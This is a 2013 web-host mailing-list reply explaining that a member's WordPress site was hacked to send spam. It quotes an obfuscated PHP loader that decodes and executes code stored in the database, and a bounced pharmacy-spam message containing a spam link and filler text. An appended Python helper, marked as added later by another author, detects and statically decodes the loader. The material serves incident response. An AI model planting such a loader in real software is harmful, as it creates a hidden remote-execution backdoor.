[HCoop-Help] wordpress spam, failed mail delivery notices.

Clinton Ebadi clinton at unknownlamer.org
Fri May 17 22:39:10 EDT 2013

Yagnesh Raghava Yakkala <yagnesh at hcoop.net> writes:

> Hello all,
> My inbox is getting filled with mail delivery failure notices today (similar
> to the attached mail). It looks like it has something to do with akismet spam
> filter on my wordpress site (sapporoindians.com). I don't understand the
> problem.
> Any insights would be great on:
> - how to know which program is initiating mail delivery
> - how to stop receiving failure notices to my inbox
> FYI, I haven't touched anything on my site for a long while now.

Ack, Jesse is right -- your site has most definitely been hacked!

This code is in a few files:

$z=get_option("_site_transient_browser_fd2cad7aa8fab7055192469be2dc6c7d"); $z=base64_decode(str_rot13($z)); if(strpos($z,"C260540C")!==false){ $_z=create_function("",$z); @$_z(); }

First, your wp-content directory is allowing ANYONE in the entire world
to write to it via afs... did you accidentally grant system:anyuser
write permissions when trying to do something else (I know the plugin
installer does not work unless your daemon user can write to

Then there is the telltale chmod 777 (that does nothing, since we are
using afs).

The file modification dates indicate that your site was likely
compromised on the first of May.

To mitigate the immediate problem (loading your site sends spam!) I
moved the site out of the way; from what I can tell you will need to
restore the database from a backup and re-install wordpress entirely:


Including changing your database password, wordpress passwords, etc. If
you do not have a database backup, you'll want to check your database
for any odd looking tables or values. I think the only damage done to
your db was inserting a few rows in the options table. If possible, you
may want to dump only posts/comment data and re-import that.

If you file a bugzilla bug, I will offer what assistance I can with
fixing your site. Luckily, it appears that the attackers did not manage
to further compromise the system or your account. Whatever you do, do
not delete the compromised files (yet).

I am going to spend some time analyzing what their code does... it is
stored as an obfuscated item in the options table. My plan is to dump
the options table and decode the function source to figure out what
exactly they were trying to do. Luckily, the outgoing mail log seems to
indicate that they were not very successful in sending much spam, but
you never know what script kiddies might be up to.

> Thanks.
> From: Mail Delivery System <Mailer-Daemon at deleuze.hcoop.net>
> Subject: Mail delivery failed: returning message to sender
> To: yagnesh at hcoop.net
> Date: Fri, 17 May 2013 14:40:50 -0400
> This message was created automatically by mail delivery software.
> A message that you sent could not be delivered to one or more of its
> recipients. This is a permanent error. The following address(es) failed:
>   peb756 at aol.com
>     SMTP error from remote mail server after RCPT TO:<peb756 at aol.com>:
>     host mailin-03.mx.aol.com []: 550 5.1.1 <peb756 at aol.com>:
>     Recipient address rejected: aol.com
> ------ This is a copy of the message, including all the headers. ------
> Return-path: <yagnesh at hcoop.net>
> Received: from navajos.hcoop.net ([] ident=yagnesh)
> 	by deleuze.hcoop.net with smtp (Exim 4.63)
> 	(envelope-from <yagnesh at hcoop.net>)
> 	id 1UdPa8-0007IJ-Ot
> 	for peb756 at aol.com; Fri, 17 May 2013 14:40:45 -0400
> Received: by navajos.hcoop.net (sSMTP sendmail emulation); Fri, 17 May 2013 14:40:44 -0400
> From: "yagnesh" <yagnesh at hcoop.net>
> X-Originating-IP:
> Date: Fri, 17 May 2013 14:40:44 -0400
> To: peb756 at aol.com
> Subject: Celebrate the May with 10% off for All Brands and Generics in our Store
> X-PHP-Originating-Script: 10924:akismet.php(32) : runtime-created function(9) : eval()'d code(1) : eval()'d code
> Message-Id: <1307461067.1496 at sapporoindians.com>
> MIME-Version: 1.0
> Content-Type: text/html
> Content-Transfer-Encoding: 8bit
> Dear Peter,<br />
> <br />
> Celebrate the May with 10% off for all Brands and Generics in our Store - use <b>Your 10% discount code: 7728315</b> at checkout for big savings.<br />
> <a href='http://fenstercamp.com/counter.php?936fb43bcac53278bf834a76f'>By reordering with us</a> you always getting best price for genuine quality and great customer service.<br />
> All goods are delivered in 7-10 business days or sooner, with live package tracking. Nothing gets lost or we will reship at no additional cost to you.<br />
> <br />
> Best regards,<br />
> RxDiler<br />
> <br />
> hundred serfs; but one of these estates had already been sold, and the<br />
> attention of a relative. The count, pipe in hand, was pacing up and down<br />
> was always conscious of his own guilt toward him for having wasted the<br />
> dying of wounds and the sovereign had thanked him for heroic deeds, and<br />
> "He has gone to Peters... But I don\'t know," said Pierre.<br />
> "Well, if it\'s too long we\'ll take it up... we\'ll tack it up in one<br />
> spirited impression.<br />
> to a man\'s face, to say what the other, whoever he might be, did not<br />
> on her face and showing no concern for her mistress.<br />
> Russian side merely because in Petersburg--far from the seat of war--a<br />
> sat down again in her former position. Twice she turned and looked at<br />
> manner. If he ever thought of Helene, it was just of her beauty and her<br />
> remembers me," said Prince Andrew with a low and courteous bow quite<br />
> to confide her sorrow, and much sorrow fell to her lot just then. The<br />
> therefore fought against Napoleon. In 1807 he suddenly made friends<br />
> as real as any other recollection. She not only remembered what she had<br />
> alert than he had done the day before. Only his eyes gleamed feverishly<br />
> at Papa!" though as it was they never took their eyes off the couple.<br />
> best of officers could do in his position, he was in a state akin to<br />
> Marya Dmitrievna on her right and Anna Mikhaylovna on her left, the<br />
> "What has happened?" asked Pierre, entering Marya Dmitrievna\'s room.<br />
> moved by fear or vanity, rejoiced or were indignant, reasoned, imagining<br />
> that somebody actually submitted such a proposal to him. But a commander<br />
> coming battle and the victory that would certainly result from it--no<br />
> distinguished his form and her shortsighted eyes tried to make out his<br />
> newly erected buildings were standing empty and that the serfs continued<br />
> who did the actual fighting.<br />
> and takes bribes. What nonsense! Besides, why shouldn\'t he take bribes?<br />
> a power, and therefore before speaking about Napoleons, Louis-es, and<br />
> to frown.<br />
> was dead--and Tikhon reminded him that she was no more, and he shouted,<br />
> ----------

unknownlamer: Hail Satan
unknownlamer: And do drugs
urbanbohemiac: are you wearing underwear
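
Added example (not part of the original message and not HCoop tooling): a static triage helper for the two artifacts quoted above, the loader line found in the site's files and the X-PHP-Originating-Script header in the bounce. It finds loader-shaped snippets, reverses the rot13 + base64 encoding of a dumped option value without executing it, and splits the header into uid, script and line. The function names and SAMPLE_VALUE are assumptions made for the example; the real option value is not on the page.

```python
import base64
import codecs
import re

# Loader line quoted in the message above (from the page, not constructed).
LOADER = r'''$z=get_option("_site_transient_browser_fd2cad7aa8fab7055192469be2dc6c7d"); $z=base64_decode(str_rot13($z)); if(strpos($z,"C260540C")!==false){ $_z=create_function("",$z); @$_z(); }'''

# Header value from the quoted bounce (from the page).
HEADER = "10924:akismet.php(32) : runtime-created function(9) : eval()'d code(1) : eval()'d code"

# Constructed stand-in for the stored option value: harmless text carrying the
# marker, encoded the way the loader expects to read it (base64, then rot13).
SAMPLE_VALUE = codecs.encode(
    base64.b64encode(b"/* C260540C constructed placeholder */").decode("ascii"), "rot13")

LOADER_RE = re.compile(
    r'get_option\(\s*["\']([^"\']+)["\']\s*\).{0,200}?'
    r'base64_decode\(\s*str_rot13\(.{0,200}?'
    r'strpos\(\s*\$\w+\s*,\s*["\']([^"\']+)["\']\s*\).{0,200}?'
    r'create_function\(', re.S)

def find_loaders(php_source):
    """Return [(option_name, marker)] for each loader-shaped snippet."""
    return LOADER_RE.findall(php_source)

def decode_option(stored):
    """Reverse the encoding statically (rot13, then base64); nothing is executed."""
    b64 = "".join(codecs.decode(stored, "rot13").split())
    return base64.b64decode(b64, validate=True).decode("utf-8", errors="replace")

def carries_marker(stored, marker):
    """True only if the value decodes cleanly and contains the loader's marker."""
    try:
        return marker in decode_option(stored)
    except ValueError:  # binascii.Error (bad base64) is a ValueError subclass
        return False

def parse_originating_script(value):
    """Split an X-PHP-Originating-Script value into uid, script, line and a flag."""
    m = re.match(r'(\d+):([^(\s]+)(?:\((\d+)\))?', value.strip())
    if not m:
        return None
    return {"uid": int(m.group(1)), "script": m.group(2),
            "line": int(m.group(3)) if m.group(3) else None,
            "dynamic": "eval()'d code" in value or "runtime-created function" in value}

if __name__ == "__main__":
    for name, marker in find_loaders(LOADER):
        print(name, marker, carries_marker(SAMPLE_VALUE, marker))
    print(parse_originating_script(HEADER))
```

Run find_loaders over each PHP file's text and carries_marker over rows dumped from the options table; a "dynamic" header means the mail was sent from code built at run time rather than from the named script's own source.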